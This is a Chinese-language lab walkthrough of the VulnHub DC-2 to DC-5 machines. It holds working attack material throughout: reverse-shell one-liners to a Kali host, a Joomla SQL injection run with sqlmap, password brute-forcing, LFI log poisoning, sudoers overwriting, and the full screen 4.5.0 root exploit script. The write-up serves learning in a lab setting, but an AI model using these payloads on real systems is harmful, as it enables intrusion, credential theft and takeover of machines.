<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -e u</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010232011091.png" alt="image-20251010232011091"></p>
<p>扫描出三个用户名，保存为user.txt.完成后。使用wpscan爆破账号密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -U user.txt -P passwd.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251010233510123.png" alt="image-20251010233510123"></p>
<p>出来了两组</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">jerry / adipiscing                                   </span><br><span class="line">tom / parturient </span><br></pre></td></tr></table></figure>

<p>直接登录,得到flag2</p>
<p><img src="/images/image-20251010233541482.png" alt="image-20251010233541482"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">If you can&#x27;t exploit WordPress and take a shortcut, there is another way.</span><br><span class="line">Hope you found another entry point.</span><br></pre></td></tr></table></figure>

<p>意思是让我们不要关注wordpress了，去关注别的地方。前面有个7744的ssh端口，尝试进行利用</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh jerry@192.168.243.137 -p 7744 </span><br></pre></td></tr></table></figure>

<p>尝试了上面的两个密码不行，换成tom继续登录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh tom@192.168.243.137 -p 7744 </span><br></pre></td></tr></table></figure>

<p>密码为<code>parturient</code>，直接登录</p>
<p><img src="/images/image-20251014213739496.png" alt="image-20251014213739496"></p>
<p>ls看文件，但是cat被限制了</p>
<p><img src="/images/image-20251014213901159.png" alt="image-20251014213901159"></p>
<p>存在rbash限制，rbash(The restricted mode of bash)，也就是限制型bash；是平时所谓的 restricted shell的一种，也是最常见的 restricted shell（rbash、ksh、rsh等）。</p>
<p>查看当前可以执行的命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">compgen -c </span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251014214634201.png" alt="image-20251014214634201"></p>
<p>发现了less命令，直接读flag3.txt</p>
<p><img src="/images/image-20251014214536315.png" alt="image-20251014214536315"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.</span><br></pre></td></tr></table></figure>

<p>提示我们提权,绕过rbash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">BASH_CMDS[a]=/bin/sh;a</span><br><span class="line">$ <span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/bin/</span><br><span class="line">$ <span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/bin</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251014220953584.png" alt="image-20251014220953584"></p>
<p>进入jerry目录，得到flag4</p>
<p><img src="/images/image-20251014221039408.png" alt="image-20251014221039408"></p>
<p>提示了<code>git</code>，查找suid权限文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251014223922171.png" alt="image-20251014223922171"></p>
<p>发现sudo，查看什么有sudo权限</p>
<p><img src="/images/image-20251014225851444.png" alt="image-20251014225851444"></p>
<p>tom不行，su换成jerry</p>
<p><img src="/images/image-20251014230114137.png" alt="image-20251014230114137"></p>
<p>发现<code>jerry</code>被配置为可以<strong>以 root 身份</strong>，且<strong>无需输入密码</strong>，来运行 <code>/usr/bin/git</code>这个命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> git <span class="built_in">help</span> config</span><br><span class="line">!/bin/bash</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251014232603852.png" alt="image-20251014232603852"></p>
<p>成功提权，切换到root目录下得到flag5</p>
<p><img src="/images/image-20251014232655779.png" alt="image-20251014232655779"></p>
<h1 id="DC-3"><a href="#DC-3" class="headerlink" title="DC-3"></a>DC-3</h1><p>nmap,whatweb进行初步信息收集</p>
<p>192.168.243.138</p>
<p><img src="/images/image-20251015210410268.png" alt="image-20251015210410268"></p>
<p>发现<code>joomla</code>框架，kali有利用工具<code>joomscan</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">joomscan -u 192.168.243.138</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015210847024.png" alt="image-20251015210847024"></p>
<p>发现版本为3.7.0,并且存在多个敏感目录。访问一下管理员界面发现需要登录，搜索一下joomla3.7.0的漏洞</p>
<p><img src="/images/image-20251015211620203.png" alt="image-20251015211620203"></p>
<p>存在sql注入，查看exploits内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /usr/share/exploitdb/exploits/php/webapps/42033.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: Joomla 3.7.0 - Sql Injection</span><br><span class="line"># Date: 05-19-2017</span><br><span class="line"># Exploit Author: Mateus Lino</span><br><span class="line"># Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html</span><br><span class="line"># Vendor Homepage: https://www.joomla.org/</span><br><span class="line"># Version: = 3.7.0</span><br><span class="line"># Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux</span><br><span class="line"># CVE : - CVE-2017-8917</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">URL Vulnerable: http://localhost/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml%27</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Using Sqlmap:</span><br><span class="line"></span><br><span class="line">sqlmap -u &quot;http://localhost/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot; --risk=3 --level=5 --random-agent --dbs -p list[fullordering]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Parameter: list[fullordering] (GET)</span><br><span class="line">    Type: boolean-based blind</span><br><span class="line">    Title: Boolean-based blind - Parameter replace (DUAL)</span><br><span class="line">    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)</span><br><span class="line"></span><br><span class="line">    Type: error-based</span><br><span class="line">    Title: MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)</span><br><span class="line">    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</span><br><span class="line"></span><br><span class="line">    Type: AND/OR time-based blind</span><br><span class="line">    Title: MySQL &gt;= 5.0.12 time-based blind - Parameter replace (substraction)</span><br><span class="line">    Payload: option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)</span><br></pre></td></tr></table></figure>

<p>直接用sqlmap跑</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.243.138/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent --dbs -p list[fullordering]</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015212156335.png" alt="image-20251015212156335"></p>
<p>得到几个数据库，用joomladb这个库继续跑</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.243.138/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent -p list[fullordering] -D <span class="string">&quot;joomladb&quot;</span> --tables</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015212539574.png" alt="image-20251015212539574"></p>
<p>发现<code>#__users </code>表，继续来爆列名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.243.138/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent -p list[fullordering] -D <span class="string">&quot;joomladb&quot;</span> -T <span class="string">&quot;#__users&quot;</span> --columns</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015212737508.png" alt="image-20251015212737508"></p>
<p>选name,username,password这三个列查看内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://192.168.243.138/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml&quot;</span> --risk=3 --level=5 --random-agent -p list[fullordering] -D <span class="string">&quot;joomladb&quot;</span> -T <span class="string">&quot;#__users&quot;</span> -C <span class="string">&quot;username,password&quot;</span> --dump</span><br></pre></td></tr></table></figure>

<p>得到账号和加密的密码值，用john爆破</p>
<p><img src="/images/image-20251015212859783.png" alt="image-20251015212859783"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;$2y$10<span class="variable">$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu</span>&quot;</span> &gt; joomla.txt</span><br><span class="line">john joomla.txt</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015213118531.png" alt="image-20251015213118531"></p>
<p>得到密码为<code>snoopy</code>,用<code>admin/snoopy</code>直接登陆前下的网站</p>
<p>搜索利用点，发现在<code>Extentions/Templates/Templates</code>下可以直接编辑php代码，直接反弹shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">system(<span class="string">&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/192.168.243.129/2333 0&gt;&amp;1&#x27;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015214311952.png" alt="image-20251015214311952"></p>
<p>然后要知道文件路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.243.138/templates/beez3/index.php</span><br></pre></td></tr></table></figure>

<p>kali开启监听即可弹shell,但是获取的权限很低，尝试提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查看suid的文件，并没有可以提权的命令。</span><br><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015220950693.png" alt="image-20251015220950693"></p>
<p>sudo -l需要密码，但是我们并不知道。尝试内核提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /etc/issue</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015223716256.png" alt="image-20251015223716256"></p>
<p>搜索ubuntu16.04提权。发现存在漏洞，这里我们利用4.4.x通用提权方式</p>
<p><img src="/images/image-20251015223836538.png" alt="image-20251015223836538"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /usr/share/exploitdb/exploits/linux/local/39772.txt</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">给出了两个地址：</span><br><span class="line">Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552</span><br><span class="line">Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip</span><br></pre></td></tr></table></figure>

<p>在kali中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip</span><br><span class="line"></span><br><span class="line">unzip 39772.zip</span><br><span class="line"></span><br><span class="line"><span class="built_in">cp</span> 39772/exploit.tar /var/www/html</span><br></pre></td></tr></table></figure>

<p>在靶机shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.243.129/exploit.tar</span><br><span class="line"></span><br><span class="line">tar -xvf exploit.tar</span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> ebpf_mapfd_doubleput_exploit</span><br><span class="line"></span><br><span class="line">./compile.sh</span><br><span class="line">./doubleput</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015231214524.png" alt="image-20251015231214524"></p>
<p>成功提权</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">cat</span> *</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251015231338507.png" alt="image-20251015231338507"></p>
<p>得到flag</p>
<h1 id="DC-4"><a href="#DC-4" class="headerlink" title="DC-4"></a>DC-4</h1><p>arp-scan -l得到ip</p>
<p>192.168.243.139</p>
<p>nmap,whatweb进行信息收集</p>
<p><img src="/images/image-20251016193429386.png" alt="image-20251016193429386"></p>
<p>访问网站首页，发现是个登录框，首先进行爆破</p>
<p><img src="/images/image-20251016193507054.png" alt="image-20251016193507054"></p>
<p>得到账号密码<code>admin/happy</code>，登录，有三个执行bash命令的地方。进行抓包</p>
<p><img src="/images/image-20251016193919643.png" alt="image-20251016193919643"></p>
<p>直接反弹shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&#x27;bash -i &gt;&amp; /dev/tcp/192.168.243.129/2333 0&gt;&amp;1&#x27;</span></span><br></pre></td></tr></table></figure>

<p>这个太长了，换一个命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e /bin/sh 192.168.243.129 2333</span><br></pre></td></tr></table></figure>

<p>kali监听2333端口得到shell,再得到交互shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure>

<p>先看一下passwd和shadow文件</p>
<p><img src="/images/image-20251016194810484.png" alt="image-20251016194810484"></p>
<p>shadow不让访问，passwd正常访问，同时可以看到目前存在三个用户</p>
<p><code>jim</code>，<code>sam</code>，<code>charles</code></p>
<p>在jin目录下发现bak备份文件</p>
<p><img src="/images/image-20251016201808339.png" alt="image-20251016201808339"></p>
<p>将结果保存在222.txt中，使用<code>hydra</code>进行ssh爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hydra -l jim -P 222.txt -t 4 ssh://192.168.243.139</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251016203551173.png" alt="image-20251016203551173"></p>
<p>成功爆破出账号密码<code>jim/jibril04</code>,ssh连接</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh jim@192.168.243.139 -p 22</span><br></pre></td></tr></table></figure>

<p>成功连接，有个提示让我们寻找邮件，找一下位置</p>
<p><img src="/images/image-20251016203818403.png" alt="image-20251016203818403"></p>
<p>在<code>/var/mail</code>中找到邮件，内容如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">From charles@dc-4 Sat Apr 06 21:15:46 2019</span><br><span class="line">Return-path: &lt;charles@dc-4&gt;</span><br><span class="line">Envelope-to: jim@dc-4</span><br><span class="line">Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000</span><br><span class="line">Received: from charles by dc-4 with local (Exim 4.89)</span><br><span class="line">        (envelope-from &lt;charles@dc-4&gt;)</span><br><span class="line">        id 1hCjIX-0000kO-Qt</span><br><span class="line">        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000</span><br><span class="line">To: jim@dc-4</span><br><span class="line">Subject: Holidays</span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text/plain; charset=&quot;UTF-8&quot;</span><br><span class="line">Content-Transfer-Encoding: 8bit</span><br><span class="line">Message-Id: &lt;E1hCjIX-0000kO-Qt@dc-4&gt;</span><br><span class="line">From: Charles &lt;charles@dc-4&gt;</span><br><span class="line">Date: Sat, 06 Apr 2019 21:15:45 +1000</span><br><span class="line">Status: O</span><br><span class="line"></span><br><span class="line">Hi Jim,</span><br><span class="line"></span><br><span class="line">I&#x27;m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.</span><br><span class="line"></span><br><span class="line">Password is:  ^xHhA&amp;hvim0y</span><br><span class="line"></span><br><span class="line">See ya,</span><br><span class="line">Charles</span><br></pre></td></tr></table></figure>

<p>得到charles的密码为<code>^xHhA&amp;hvim0y</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh charles@192.168.243.139 -p 22</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251016204109760.png" alt="image-20251016204109760"></p>
<p>成功登录，接下来继续提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<p>发现teehee不需要密码可以有root权限，可以利用teehee提权</p>
<p><img src="/images/image-20251016204552176.png" alt="image-20251016204552176"></p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/zlgxzswjy/p/16118468.html">https://www.cnblogs.com/zlgxzswjy/p/16118468.html</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;charles ALL=(ALL) NOPASSWD:ALL&quot;</span>| <span class="built_in">sudo</span> teehee -a /etc/sudoers</span><br><span class="line"><span class="built_in">sudo</span> bash</span><br><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">cat</span> *</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251016205651004.png" alt="image-20251016205651004"></p>
<p>得到flag</p>
<h1 id="DC-5"><a href="#DC-5" class="headerlink" title="DC-5"></a>DC-5</h1><p><code>arp-scan -l</code>得到靶机ip</p>
<p>192.168.243.140</p>
<p>nmap,whatweb,dirsearch信息收集</p>
<p><img src="/images/image-20251017223143352.png" alt="image-20251017223143352"></p>
<p><img src="/images/image-20251017223207204.png" alt="image-20251017223207204"></p>
<p><img src="/images/image-20251017224507116.png" alt="image-20251017224507116">nmap发现开放有<code>80</code>，<code>111</code>，<code>57878</code>端口，尝试访问</p>
<p>在contact页面发现有东西，填入点东西提交，抓包</p>
<p>这是第一次的响应包</p>
<p><img src="/images/image-20251017223717151.png" alt="image-20251017223717151"></p>
<p>这是第二次的响应包</p>
<p><img src="/images/image-20251017223742836.png" alt="image-20251017223742836"></p>
<p>发现不同点在底下的这个年份，刷新一次变化一次。再发包还会变成2020</p>
<p>刚才dirsearch扫出来个<code>footer.php</code>，这控制了底下的这个年份数字。访问，一直刷新这个年份就一直变化</p>
<p><img src="/images/image-20251017224709039.png" alt="image-20251017224709039"></p>
<p><img src="/images/image-20251017224720650.png" alt="image-20251017224720650"></p>
<p>那刚才的<code>thankyou.php</code>就包含了这个文件，用来显示底下的这个年份。尝试包含敏感文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.243.140/thankyou.php?file=../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251017224856900.png" alt="image-20251017224856900"></p>
<p>可以看到成功包含了<code>/etc/passwd</code>，下一步getshell，一般文件包含能拿到shell的就是日志投毒了。前面得知网站用nginx进行反向代理。nginx的路径位置在<code>/var/log/nginx/access.log</code>。在ua头写马</p>
<p><img src="/images/image-20251017225605617.png" alt="image-20251017225605617"></p>
<p><img src="/images/image-20251017225625844.png" alt="image-20251017225625844"></p>
<p>成功上马，现在虚拟终端写入弹shell的命令即可</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&#x27;bash -i &gt;&amp; /dev/tcp/192.168.243.129/2333 0&gt;&amp;1&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251017225921408.png" alt="image-20251017225921408"></p>
<p>接下来提权，查找有SUID权限的文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251017230154856.png" alt="image-20251017230154856"></p>
<p>发现有个<code>screen-4.5.0</code>,存在漏洞</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit screen 4.5.0 </span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251018164348226.png" alt="image-20251018164348226"></p>
<p>将攻击脚本文件复制到当前目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit -m 41154</span><br></pre></td></tr></table></figure>

<p>查看内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> 41154*</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">!/bin/bash</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">screenroot.sh</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">setuid screen v4.5.0 <span class="built_in">local</span> root exploit</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">abuses ld.so.preload overwriting to get root.</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">HACK THE PLANET</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">~ infodox (25/1/2017)</span></span><br><span class="line">echo &quot;~ gnu/screenroot ~&quot;</span><br><span class="line">echo &quot;[+] First, we create our shell and library...&quot;</span><br><span class="line">cat &lt;&lt; EOF &gt; /tmp/libhax.c</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">include &lt;sys/types.h&gt;</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">include &lt;unistd.h&gt;</span></span><br><span class="line">__attribute__ ((__constructor__))</span><br><span class="line">void dropshell(void)&#123;</span><br><span class="line">    chown(&quot;/tmp/rootshell&quot;, 0, 0);</span><br><span class="line">    chmod(&quot;/tmp/rootshell&quot;, 04755);                                                                                                                        </span><br><span class="line">    unlink(&quot;/etc/ld.so.preload&quot;);                                                                                                                          </span><br><span class="line">    printf(&quot;[+] done!\n&quot;);                                                                                                                                 </span><br><span class="line">&#125;</span><br><span class="line">EOF</span><br><span class="line">gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c</span><br><span class="line">rm -f /tmp/libhax.c</span><br><span class="line">cat &lt;&lt; EOF &gt; /tmp/rootshell.c</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">include &lt;stdio.h&gt;</span></span><br><span class="line">int main(void)&#123;</span><br><span class="line">    setuid(0);</span><br><span class="line">    setgid(0);</span><br><span class="line">    seteuid(0);</span><br><span class="line">    setegid(0);</span><br><span class="line">    execvp(&quot;/bin/sh&quot;, NULL, NULL);</span><br><span class="line">&#125;</span><br><span class="line">EOF</span><br><span class="line">gcc -o /tmp/rootshell /tmp/rootshell.c</span><br><span class="line">rm -f /tmp/rootshell.c</span><br><span class="line">echo &quot;[+] Now we create our /etc/ld.so.preload file...&quot;</span><br><span class="line">cd /etc</span><br><span class="line">umask 000 # because</span><br><span class="line">screen -D -m -L ld.so.preload echo -ne  &quot;\x0a/tmp/libhax.so&quot; # newline needed</span><br><span class="line">echo &quot;[+] Triggering...&quot;</span><br><span class="line">screen -ls # screen itself is setuid, so...</span><br><span class="line">/tmp/rootshell</span><br></pre></td></tr></table></figure>

<p>将这个脚本复制到web目录下，然后靶机下载即可</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kali:</span><br><span class="line"><span class="built_in">cp</span> 41154* /var/www/html</span><br><span class="line">service apache2 start</span><br><span class="line">靶机:</span><br><span class="line"><span class="built_in">cd</span> /tmp</span><br><span class="line">wget http://192.168.243.129/41154.sh</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251018165352517.png" alt="image-20251018165352517"></p>
<p>然后切换到交互式shell，在&#x2F;root目录下找到flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br><span class="line"><span class="built_in">cd</span> /root | <span class="built_in">cat</span> *</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20251018165438131.png" alt="image-20251018165438131"></p>

    </div>

